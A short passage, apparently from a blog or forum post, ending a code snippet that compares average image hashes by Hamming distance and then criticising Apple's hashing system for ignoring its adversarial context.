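# near 0, while a cropped or rotated copy will typically differ in many bits.
# print(hamming_distance(average_hash("photo.jpg"), average_hash("photo_resized.jpg")))
```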

This was a bad idea from the start, and Apple never seemed to consider the adversarial context of the system as a whole, not just the cryptography.